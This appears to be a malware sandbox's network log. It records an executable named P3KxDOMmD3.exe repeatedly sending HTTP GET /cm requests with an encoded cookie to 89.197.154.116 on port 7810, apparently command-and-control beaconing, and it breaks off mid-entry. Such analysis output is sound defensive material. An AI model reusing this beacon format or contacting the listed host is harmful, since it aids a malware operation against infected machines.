Oct 7, 2024 22:00:42.490438938 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49758	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:44.205595970 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49759	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:45.939424038 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49760	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:47.645029068 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49761	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:49.394248009 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49762	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:51.276710033 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49763	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:53.004349947 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49764	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:54.690186024 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49765	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:56.378082991 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49767	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:58.082648039 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49769	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:59.799335957 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49780	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:01.673264027 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49791	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:03.394442081 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49807	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:05.096041918 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49818	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:06.799372911 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49825	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:08.770409107 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49840	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:10.472955942 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49851	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:12.206017017 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49857	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:13.927268982 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49868	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:15.643258095 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49879	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:17.363678932 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49894	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:19.284923077 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49906	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:20.987730980 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49918	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:22.721848011 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49931	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:24.411634922 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49939	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:26.220334053 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49964	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:30.410578012 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49974	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:32.114314079 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49985	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:33.848839045 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49999	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:35.566514015 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	50010	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:37.363455057 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	50022	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:39.086510897 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	50031	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:40.784991026 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	50036	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:42.676671982 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	50047	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:44.366333961 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	50056	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
